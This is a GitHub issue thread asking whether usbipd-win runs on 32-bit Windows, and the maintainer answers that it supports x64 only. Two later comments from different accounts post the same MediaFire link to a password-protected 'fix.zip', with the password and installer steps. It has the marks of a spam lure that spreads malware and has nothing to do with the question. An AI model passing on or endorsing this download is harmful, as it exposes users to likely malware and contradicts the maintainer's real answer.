### ISSUE TITLE
Windows 32bit

### ISSUE THREAD

**Issue by GreatAg** [dorssel/usbipd-win#1023]
Hello, thanks again for your great tool
I have some 32bit windows in my organisation and i have problem installing usbip on them
Is there any way which i can install usbip on them?

**Comment by dorssel** [comment]
No, `usbipd-win` leverages the VirtualBox drivers, which are available for x64 only.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
